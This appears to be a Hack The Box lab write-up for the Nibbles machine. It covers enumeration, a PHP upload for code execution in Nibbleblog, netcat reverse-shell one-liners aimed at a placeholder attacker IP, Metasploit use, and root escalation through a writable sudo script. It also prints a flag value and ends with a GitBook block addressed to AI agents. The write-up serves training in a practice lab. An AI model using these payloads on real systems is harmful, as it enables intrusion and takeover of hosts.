> For the complete documentation index, see [llms.txt](https://sgtdiddlywink.gitbook.io/htb/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/nibbles.md). # Nibbles ## Overview Remember that enumeration is an iterative process. After performing our `Nmap` port scans, make sure to perform detailed enumeration against all open ports based on what is running on the discovered ports. Follow the same process as we did with `Nibbles`: * Enumeration/Scanning with `Nmap` - perform a quick scan for open ports followed by a full port scan * Web Footprinting - check any identified web ports for running web applications, and any hidden files/directories. Some useful tools for this phase include `whatweb` and `Gobuster` * If you identify the website URL, you can add it to your '/etc/hosts' file with the IP you get in the question below to load it normally, though this is unnecessary. * After identifying the technologies in use, use a tool such as `Searchsploit` to find public exploits or search on Google for manual exploitation techniques * After gaining an initial foothold, use the `Python3 pty` trick to upgrade to a pseudo TTY * Perform manual and automated enumeration of the file system, looking for misconfigurations, services with known vulnerabilities, and sensitive data in cleartext such as credentials * Organize this data offline to determine the various ways to escalate privileges to root on this target There are two ways to gain a foothold—one using `Metasploit` and one via a manual process. Challenge ourselves to work through and gain an understanding of both methods. There are two ways to escalate privileges to root on the target after obtaining a foothold. Make use of helper scripts such as [LinEnum](https://github.com/rebootuser/LinEnum) and [LinPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) to assist you. Filter through the information searching for two well-known privilege escalation techniques. ## Hacking the Box Check website first on firefox Check the source code and discovered that in the comments they make reference to a directory named `/nibbleblog/` Scan the network with `nmap` Use `gobuster` to see what other extensions exist Work through the different directories The `/admin.php` is a login page. The source code doesn't reveal anything. Check the `/content` directory and in the in `/content/private/users.xml` they mention that one of the users is admin Checking the `/content/private/config.xml` they make reference to `nibbles` a lot which coincidently is the password for the admin account. Signing into the `/admin.php` with the credentials above gives a bit more access. Under the Plugins tab, go to the `My Image` plugin to upload `.php` file. ```php ``` Create a new .php file with the code above. This code tests for code execution. Upload the file and save changes. You'll get a bunch of errors but it looks like the code successfully uploaded. We need to figure out where the file got uploaded. In the `/content` directory there is a `plugins` directory and another sub-directory for `my_image`. `http:///nibbleblog/content/private/plugins/my_image/` Attempt to gain command execution on server by using curl with `image.php`: ```shell-session curl http://10.129.42.190/nibbleblog/content/private/plugins/my_image/image.php uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler) ``` If you get the following back then you have gained remote code execution: ```shell-session uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler) ``` Next is to modify the php file to obtain a reverse shell. Use the following BASH reverse shell one-liner and add it to the PHP script: ```php &1|nc [ATTACKING_IP] [LISTENING_PORT] >/tmp/f"); ?> ``` We'll upload the file again to the website similar to the above and then we'll start a netcat listener. ```shell-session nc -lvnp 9443 ``` cURL the image page again (similar to above) or browse to it in Firefox at: `http://nibbleblog/content/private/plugins/my_image/image.php` to execute the reverse shell It worked better when I used cURL. This should give you reverse access. Before we move forward with additional enumeration, let us upgrade our shell to a "nicer" shell since the shell that we caught is not a fully interactive TTY and specific commands such as `su` will not work, we cannot use text editors, tab-completion does not work, etc. Use the link below to learn how to fully upgrade your reverse shell to a fully interactive TTY. {% embed url="" %} We will use a Python one-liner to spawn a pseudo-terminal so commands such as `su` and `sudo` will work. ```bash python3 -c 'import pty; pty.spawn("/bin/bash")' ``` This will give you a more interactive terminal access. Redirect to the file location for access to the user.txt flag: `/home/nibbler` 79c03865431abf47b90ef24b9695e148 ## METASPLOIT ALTERNATIVE to gaining access Start `msfconsole` on your host machine. Search for an exploit for nibbleblog ```shell-session search nibbleblog ``` Type: `use 0` To load the exploit. Check the options and set the RHOST to the TARGET\_IP and LHOST to HOST\_IP (tun0 address). Set the USERNAME and PASSWORD options as admin:nibbles Set the TARGETURI to nibbleblog Next is to change the payload type. We will use a generic payload for reverse tcp connection: `generic/shell_reverse_tcp` Once the payload is complete you will have terminal access to the nibbler account. ### Next is to escalate priveleges. Start by unzipping the `personal.zip` file in `/home/nibbler`and see a file called `monitor.sh` ```shell-session unzip personal.zip ``` The shell script `monitor.sh` is a monitoring script, and it is owned by our `nibbler` user and writeable. `cat` the file to preview: ```shell-session cat monitor.sh ``` Let us put this aside for now and pull in [LinEnum.sh](https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh) to perform some automated privilege escalation checks. First, download the script to your local attack VM or the Pwnbox. Start by making a directory in your specified file location called linenum and cd into it. Run this command from there to download the .sh file. ``` wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh ``` Then start a `Python` HTTP server using the command `sudo python3 -m http.server 8080`. On your host machine in the directory with the linenum.sh file. ```shell-session sudo python3 -m http.server 8080 ``` On target machine: `wget http://[HOST_IP]:8080/LinEnum.sh` On target machine change the permissions for the file to be executable. `chmod +x LinEnum.sh` Run the shell file on the target machine and wait for it to resolve. this will take a while: `./LinEnum.sh` The nibbler user can run the file `/home/nibbler/personal/stuff/monitor.sh` with root privileges. Being that we have full control over that file, if we append a reverse shell one-liner to the end of it and execute with `sudo` we should get a reverse shell back as the root user. Let us edit the `monitor.sh` file to append a reverse shell one-liner. ```shell-session echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [HOST_IP] 8443 >/tmp/f' | tee -a monitor.sh ``` If we cat the `monitor.sh` file, we will see the contents appended to the end. `It is crucial if we ever encounter a situation where we can leverage a writeable file for privilege escalation. We only append to the end of the file (after making a backup copy of the file) to avoid overwriting it and causing a disruption.` Start a new netcat listener on another terminal: ```shell-session nc -lvnp 8443 ``` Execute the script with `sudo`: ```shell-session sudo /home/nibbler/personal/stuff/monitor.sh ``` You should now have root priveleges on your listening terminal. Redirect to `/root/root.txt` for the final flag. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://sgtdiddlywink.gitbook.io/htb/machines/easy-machines/nibbles.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.